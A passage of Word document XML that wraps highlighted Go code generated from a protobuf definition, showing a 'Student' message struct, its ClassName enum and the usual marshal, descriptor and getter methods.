      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>"class1": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C153D" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>"class2": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26377FB8" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>"class3": 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B7AAB" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310DB286" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (x ClassName) String() string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758689E8" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return proto.EnumName(ClassName_name, int32(x))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45657135" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB4D5B2" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (ClassName) EnumDescriptor() ([]byte, []int) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3776E688" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return fileDescriptor_c161fcfdc0c3ff1e, []int{0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6776B337" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC62D94" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>type Student struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CF767D" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Name                 string    `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32014638" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Age                  int32     `protobuf:"varint,2,opt,name=age,proto3" json:"age,omitempty"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF9DA5" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Address              string    `protobuf:"bytes,3,opt,name=address,proto3" json:"address,omitempty"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047FBD57" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Cn                   ClassName `protobuf:"varint,4,opt,name=cn,proto3,enum=main.ClassName" json:"cn,omitempty"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F6E2D" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>XXX_NoUnkeyedLiteral struct{}  `json:"-"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20827756" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>XXX_unrecognized     []byte    `json:"-"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4828E08E" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>XXX_sizecache        int32     `json:"-"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B77E8" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B73F4B1" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F1C58" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) Reset()         { *m = Student{} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696F2120" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) String() string { return proto.CompactTextString(m) }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756BB90" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>func (*Student) ProtoMessage()    {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05667595" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (*Student) Descriptor() ([]byte, []int) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B988AE" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return fileDescriptor_c161fcfdc0c3ff1e, []int{0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD53DA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3846A777" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) XXX_Unmarshal(b []byte) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09934ED5" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return xxx_messageInfo_Student.Unmarshal(m, b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344099B" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14318369" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8B0F9D" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return xxx_messageInfo_Student.Marshal(b, m, deterministic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E2C3EA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D82C598" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) XXX_Merge(src proto.Message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE32D09" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>xxx_messageInfo_Student.Merge(m, src)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243A3CA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF36FA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) XXX_Size() int {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1CF04F" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return xxx_messageInfo_Student.Size(m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543BD838" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2CE2A" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) XXX_DiscardUnknown() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160BD15D" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>xxx_messageInfo_Student.DiscardUnknown(m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6BA7C9" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6310C367" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15252A27" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var xxx_messageInfo_Student proto.InternalMessageInfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCEC494" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10583444" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) GetName() string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D9C7A8" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>if m != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD3F4A" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return m.Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3801C9C2" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A5E314" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72055AAB" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52743B3F" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5011B3BB" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) GetAge() int32 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5228F096" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>if m != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A29AAA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return m.Age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04141C04" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12837808" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A095AF" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
